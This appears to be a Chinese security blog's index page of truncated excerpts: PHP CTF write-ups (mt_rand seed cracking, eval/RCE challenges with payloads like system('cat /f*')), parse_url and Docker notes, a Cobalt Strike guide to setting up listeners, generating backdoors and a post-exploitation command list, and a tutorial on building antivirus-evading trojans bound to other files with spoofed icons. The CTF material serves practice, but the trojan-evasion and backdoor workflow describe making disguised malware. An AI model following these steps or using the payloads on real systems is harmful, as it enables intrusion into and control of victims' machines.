梦~醒🍇

在PHP中，变量以$符号开头，后面拼接变量名。上述代码的基本 含义是:从$str变量中随机取32次字符(字符可重复)，并拼接成字符 串，最后将该字符串赋值给变量$password。执行代码后会输出 $password变量的前10个字节，此时通过POST请求传递password参数到 服务端，如果password参数的值与$password变量的值完全相等，那么 就会输出flag。 理论上，如果选取字符的时候是完全随机的，那么几乎不可能出现 password参数值与$password变量值相等的情况(概率极低)。但由于 代码中使用mt_rand()函数来生成随机数，因此如果可以得知该函数生 成的一段随机数序列，就可以通过工具爆破出其选取的随机数种子 (该种子由$_Session[‘seed’]变量生成)，从而预测之后的所有随机数序 列。在这里，我们使用php_mt_seed工具来爆破随机数种子。该工具的 下载地址为:https://www.openwall.com/php_mt_seed/php_mt_seed- 4.0.tar.gz 访问题目页面，可得到前10个字节的随机字符，将输 ...

parse_url函数 作用：parse_url — 解析 URL，返回其组成部分 mixed parse_url ( string $url [, int $component = -1 ] ) 本函数解析一个 URL 并返回一个关联数组，包含在 URL 中出现的各种组成部分。 参数： url：要解析的 URL。无效字符将使用 _ 来替换。 component： 指定 PHP_URL_SCHEME、 PHP_URL_HOST、 PHP_URL_PORT、 PHP_URL_USER、 PHP_URL_PASS、 PHP_URL_PATH、PHP_URL_QUERY 或 PHP_URL_FRAGMENT 的其中一个来获取 URL 中指定的部分的 string。 （除了指定为PHP_URL_PORT 后，将返回一个 integer 的值）。 对严重不合格的 URL，parse_url() 可能会返回 FALSE （CTF常用 返回值False 用于逃逸判断） 1234567891011121314151617DEMO<?php$url = 'http://username: ...

docker保存和打包镜像 作用：在现在容器镜像上保存镜像进行打包，在另一台服务上使用；或现有的容器安装了一些库，配置了开发环境，需要保存下载，下次加载后直接使用。 1.1 首先查看下现有容器镜像（目的是查询需要保存镜像的ID） 1docker ps -a 1.2 接下来用commit参数进行保存镜像（精简版） 1docker commit 7ca736d99653 yolov5:v6.2 其中，7ca736d99653 是需要保存镜像的ID，刚才用docker ps -a 查询到的。 打包tar 使用save参数进行打包，格式如：docker save -o tar文件名称 镜像REPOSITORY:TAG 1docker save -o yolov5-v6.2.tar yolov5:v6.2 其中yolov5:v6.2 是需要保存镜像的REPOSITORY、和TAG；也是上面保存的镜像名称。

ez_eval 123456789 <?phphighlight_file(__FILE__);error_reporting(0);$hubu = $_GET['hubu'];eval($hubu);?> 先进行代码审计，GET传参hubu，并执行命令，没有任何绕过，放开手脚去做 payload: 1?hubu=system('cat /f*'); #直接rce rce_level1 12345678910 <?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);} 代码审计，发现过滤了关键字flag,sys ...

使用大致流程 创建团队服务器->客户端连接服务器->创建监听器->生成后门对应监听器->靶机运行后门成功上线->后渗透（提权，内网漫游，域渗透等） 一、安装 把全部文件下上传到外网VPS上，并给足权限 服务端运行起来 本地电脑使用客户端连接即可 主要输入HOST、Port、password即可 二、上线 1、设置监听器 2、生成木马后门 运行即可上线CS 3、指令大全 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889browserpivot 注入受害者浏览器进程sleep 3 全部命令3秒执行bypassuac 绕过UACcancel 取消正在进行的下载cd 切换目录checkin 强制让被控端回连一次clear 清除beacon内部的任务队 ...

免杀木马+文件捆绑+权限伪装 文章前言 通过学习使用Cobalt Strike来制作木马，使用摧日对其进行免杀覆盖，使用GoFilebinder对其进行免杀捆绑，最后利用Restorator对其进行图标修改。 环境和软件准备 \1. 一台windows系统的电脑作为攻击机 2.一台靶机 3.Cobalt Strike 4.摧日 5.GoFilebinder 6.Restorator 工具介绍 摧日：一款红队专用免杀木马生成器，基于shellcode生成绕过所有杀软的木马主要支持C语言的shellcode和纯十六进制的shellcode GoFileBinder：golang免杀捆绑器 Restorator：一款修改exe执行程序图标的小工具 正文开始 选用cs中的c格式shellcode，用cs生成一个c语言的相关东西，同时勾选上x64 完成以上步骤后，接下来便开始对其进行免杀操作，用到的工具摧日对其进行免杀处理 使用前请先获取相关工具，并确保已经安装工具所需要的的go环境，至于go环境安装请各位自行查阅本文不在做出相关介绍，安装完毕后进行下一步操作。复制上一步 ...